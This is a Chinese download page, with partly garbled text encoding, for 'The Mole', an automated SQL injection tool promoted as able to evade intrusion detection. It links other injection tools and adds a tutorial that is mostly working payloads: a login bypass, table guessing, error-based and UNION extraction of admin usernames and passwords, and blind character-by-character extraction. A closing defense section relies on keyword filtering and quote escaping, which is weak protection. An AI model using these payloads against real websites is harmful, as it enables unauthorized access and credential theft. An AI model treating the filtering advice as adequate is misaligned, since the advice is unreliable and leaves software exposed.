-
the mole工具(自動(dòng)化SQL注入工具)
v0.3 英文命令行工具_(dá)附教程 -
- 軟件大。4.9M
- 軟件語(yǔ)言:中文
- 軟件類(lèi)型:國(guó)產(chǎn)軟件 / 系統(tǒng)安全
- 軟件授權(quán):免費(fèi)軟件
- 更新時(shí)間:2017-06-02 16:33
- 軟件等級(jí):
- 應(yīng)用平臺(tái):WinAll, WinXP, Win7
- 軟件官網(wǎng):暫無(wú)
相關(guān)軟件
NBSI注入漏洞檢測(cè)工具v3.0.1 綠色中文版
119KB/中文/10.0
bsql hacker(SQL自動(dòng)注入工具)v0.9.0.9 中文
2.8M/中文/10.0
螞蟻sql注入工具v1. 0.0.20 綠色版
954KB/中文/10.0
pangolin(穿山甲sql注入工具)v4.1 綠色多語(yǔ)
30.8M/中文/.4
Havij pro(自動(dòng)化SQL注入工具)v1.19 特別版
6.3M/中文/7.0
軟件介紹人氣軟件精品推薦相關(guān)文章網(wǎng)友評(píng)論下載地址
-
the mole注入工具是有sql注入需要的用戶(hù)們不可錯(cuò)過(guò)的強(qiáng)大工具,有了該軟件,用戶(hù)們就會(huì)發(fā)現(xiàn)注入sql會(huì)變得簡(jiǎn)單許多,具體的軟件介紹如下,有需要的朋友們歡迎前來(lái)下載!
the mole官方介紹:
The Mole是一款開(kāi)源的自動(dòng)化sql注入工具,其可繞過(guò)IPS/IDS(入侵防御系統(tǒng)/入侵檢測(cè)系統(tǒng)).只需提供一個(gè)URL和一個(gè)可用的關(guān)鍵字,它就能夠檢測(cè)注入點(diǎn)并利用.The Mole可以使用union注入技術(shù)和基于邏輯查詢(xún)的注入技術(shù).The Mole攻擊范圍包括sql server、mysql、Postgres和oracle數(shù)據(jù)庫(kù)
sql的注入方法:
方法1
后臺(tái)身份驗(yàn)證繞過(guò)漏洞
驗(yàn)證繞過(guò)漏洞就是'or'='or'后臺(tái)繞過(guò)漏洞,利用的就是AND和OR的運(yùn)算規(guī)則,從而造成后臺(tái)腳本邏輯性錯(cuò)誤
例如管理員的賬號(hào)密碼都是admin,那么再比如后臺(tái)的數(shù)據(jù)庫(kù)查詢(xún)語(yǔ)句是
user=request("user")
passwd=request("passwd")
sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&'''
那么我使用'or 'a'='a來(lái)做用戶(hù)名密碼的話,那么查詢(xún)就變成了
select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'
這樣的話,根據(jù)運(yùn)算規(guī)則,這里一共有4個(gè)查詢(xún)語(yǔ)句,那么查詢(xún)結(jié)果就是 假or真and假or真,先算and 再算or,最終結(jié)果為真,這樣就可以進(jìn)到后臺(tái)了
這種漏洞存在必須要有2個(gè)條件,第一個(gè):在后臺(tái)驗(yàn)證代碼上,賬號(hào)密碼的查詢(xún)是要同一條查詢(xún)語(yǔ)句,也就是類(lèi)似
sql="select * from admin where username='"&username&'&"passwd='"&passwd&'
如果一旦賬號(hào)密碼是分開(kāi)查詢(xún)的,先查帳號(hào),再查密碼,這樣的話就沒(méi)有辦法了.
第二就是要看密碼加不加密,一旦被MD5加密或者其他加密方式加密的,那就要看第一種條件有沒(méi)有可以,沒(méi)有達(dá)到第一種條件的話,那就沒(méi)有戲了
方法2
先猜表名
And (Select count(*) from 表名)<>0
猜列名
And (Select count(列名) from 表名)<>0
或者也可以這樣
and exists (select * from 表名)
and exists (select 列名 from 表名)
返回正確的,那么寫(xiě)的表名或列名就是正確
這里要注意的是,exists這個(gè)不能應(yīng)用于猜內(nèi)容上,例如and exists (select len(user) from admin)>3 這樣是不行的
很多人都是喜歡查詢(xún)里面的內(nèi)容,一旦iis沒(méi)有關(guān)閉錯(cuò)誤提示的,那么就可以利用報(bào)錯(cuò)方法輕松獲得庫(kù)里面的內(nèi)容
獲得數(shù)據(jù)庫(kù)連接用戶(hù)名:;and user>0
這個(gè)是小竹提出來(lái)的,我這里引用《SQL注入天書(shū)》里面的一段話來(lái)講解:
"重點(diǎn)在and user>0,我們知道,user是SQLServer的一個(gè)內(nèi)置變量,它的值是當(dāng)前連接的用戶(hù)名,類(lèi)型為nvarchar.拿一個(gè) nvarchar的值跟int的數(shù)0比較,系統(tǒng)會(huì)先試圖將nvarchar的值轉(zhuǎn)成int型,當(dāng)然,轉(zhuǎn)的過(guò)程中肯定會(huì)出錯(cuò),SQLServer的出錯(cuò)提示是:將nvarchar轉(zhuǎn)換int異常,XXXX不能轉(zhuǎn)換成int"
看到這里大家明白了吧,報(bào)錯(cuò)的原理就是利用SQLserver內(nèi)置的系統(tǒng)表進(jìn)行轉(zhuǎn)換查詢(xún),轉(zhuǎn)換過(guò)程會(huì)出錯(cuò),然后就會(huì)顯示出在網(wǎng)頁(yè)上,另外還有類(lèi)似的and 1=(selet top 1 user from admin),這種語(yǔ)句也是可以爆出來(lái)的.;and db_name()>0 則是暴數(shù)據(jù)庫(kù)名.
一旦關(guān)閉了IIS報(bào)錯(cuò),那么還可以用union(聯(lián)合查詢(xún))來(lái)查內(nèi)容,主要語(yǔ)句就是
Order by 10
And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin
上面的order by 10主要就是查字段數(shù)目,admin就是表名,可以自己猜,user,passwd是列名
反正就是返回正確即對(duì),返回異常即錯(cuò)
另外還有十分常用的ASCII碼拆半法
先要知道指定列名,例如user里的內(nèi)容的長(zhǎng)度
and (select len(user) from admin)=2 就是查詢(xún)長(zhǎng)度為不為2位,返回錯(cuò)誤的增加或減少數(shù)字,一般這個(gè)數(shù)字不會(huì)太大,太大的就要放棄了,猜也多余
后面的邏輯符號(hào)可以根據(jù)不同要求更改的,
>;大于 <;小于 =就是等于咯,更新語(yǔ)句的話,=也可以表示傳遞符號(hào) <>;就是不等
知道了長(zhǎng)度后就可以開(kāi)始猜解了
And (Select top 1 asc(mid(user,n,1)) from admin)>100
n就是猜解的表名的第幾位,最后的長(zhǎng)度數(shù)字就是剛才猜解出來(lái)的列名長(zhǎng)度了,And (Select top 1 asc(mid(user,1,1)) from admin)>100 就是猜解user里內(nèi)容的第一位的ASCII字符是不是大于100
正確的話,那么表示USER第一個(gè)字符的ASCII碼大于100,那么就猜>120,返回錯(cuò)誤就是介于100-120之間,然后再一步一步的縮少,最終得到正確字符XXX,然后用ASCII轉(zhuǎn)換器吧這個(gè)轉(zhuǎn)換成普通字符就可以了
然后就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)>100 一直猜下去
加在url后面,列名表名還是先猜解,返回正確的代表帳號(hào)的ASCII碼大于100,那么就再向前猜,直到報(bào)錯(cuò),把猜出來(lái)的ASCII碼拿去ASCII轉(zhuǎn)換器轉(zhuǎn)換就可以了,中文是負(fù)數(shù),加上asb取絕對(duì)值
And (Select top 1 asb(asc(mid(user,n,1))) from admin)>15320
得到之后就記得在數(shù)字前加-號(hào),不然ASCII轉(zhuǎn)換器轉(zhuǎn)換不來(lái)的,中文在ASCII碼里是-23423這樣的,所以猜起來(lái)挺麻煩
這個(gè)猜解速度比較慢,但是效果最好,最具有廣泛性
方法3
防御方法
對(duì)于怎么防御SQL注入呢,這個(gè)網(wǎng)上很多,我這里講幾個(gè)
如果自己編寫(xiě)防注代碼,一般是先定義一個(gè)函數(shù),再在里面寫(xiě)入要過(guò)濾的關(guān)鍵詞,如select ; "";from;等,這些關(guān)鍵詞都是查詢(xún)語(yǔ)句最常用的詞語(yǔ),一旦過(guò)濾了,那么用戶(hù)自己構(gòu)造提交的數(shù)據(jù)就不會(huì)完整地參與數(shù)據(jù)庫(kù)的操作.
當(dāng)然如果你的網(wǎng)站提交的數(shù)據(jù)全部都是數(shù)字的,可以使用小竹提供的方法
Function SafeRequest(ParaName,ParaType)
'--- 傳入?yún)?shù) ---
'ParaName:參數(shù)名稱(chēng)-字符型
'ParaType:參數(shù)類(lèi)型-數(shù)字型(1表示以上參數(shù)是數(shù)字,0表示以上參數(shù)為字符)
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "參數(shù)" & ParaName & "必須為數(shù)字型!"
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function
然后就用SafeRequest()來(lái)過(guò)濾參數(shù) ,檢查參數(shù)是否為數(shù)字,不是數(shù)字的就不能通過(guò).
the mole工具測(cè)評(píng):
The Mole是一款自動(dòng)化的SQL注入漏洞利用工具.只需提供一個(gè)URL和一個(gè)可用的關(guān)鍵字,它就能夠檢測(cè)注入點(diǎn)并利用.The Mole可以使用union注入技術(shù)和基于邏輯查詢(xún)的注入技術(shù).
-
更多>>軟件截圖
推薦軟件
火絨互聯(lián)網(wǎng)安全軟件 22.1M
下載/中文/29v5.0.71.2-2022.11.21.1 官方版QQ電腦管家2022最新版 63.0M
下載/中文/5v15.4.22893.220 官方版騰訊電腦管家pc版安裝包 63.0M
下載/中文/10v15.4.22893.220 官方最新版2345安全衛(wèi)士電腦版 95.5M
下載/中文/4v7.9.1.13925 官方正式版360游戲保險(xiǎn)箱 9.2M
下載/中文/2v7.3.1.1011 官方正式版金山急救箱單文件版 26.3M
下載/中文/1v3.5 免費(fèi)綠色版網(wǎng)站安全狗 36.9M
下載/中文/1v4.0.22290 官方iis版360安全保險(xiǎn)箱(360Safebox) 5.8M
下載/中文/2v5.0 綠色版
其他版本下載
精品推薦sql注入工具
- 更多 (9個(gè)) >>sql注入工具SQL注入工具是一系列可以幫助用戶(hù)們進(jìn)行SQL注入的軟件工具,SQL注入是指通過(guò)把SQL命令插入到Web表單遞交或輸入域名或頁(yè)面請(qǐng)求的查詢(xún)字符串,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令,致使非法數(shù)據(jù)侵入系統(tǒng).由于SQL注入利用
pangolin(穿山甲sql注入工具)30.8M
/中文/2bsql hacker(SQL自動(dòng)注入工具)2.8M
/中文/0Havij pro(自動(dòng)化SQL注入工具)6.3M
/中文/7明小子sql注入工具3.9M
/中文/2SQLmap免python環(huán)境綠色版本21.4M
/中文/1NBSI注入漏洞檢測(cè)工具119KB
/中文/0sqlmap(sql注入測(cè)試工具)21.4M
/中文/1螞蟻sql注入工具954KB
/中文/0
相關(guān)文章
-
下載地址
-
the mole工具(自動(dòng)化SQL注入工具) v0.3 英文命令行工具_(dá)附教程
-
-
查看所有評(píng)論>>網(wǎng)友評(píng)論
-
更多>>猜你喜歡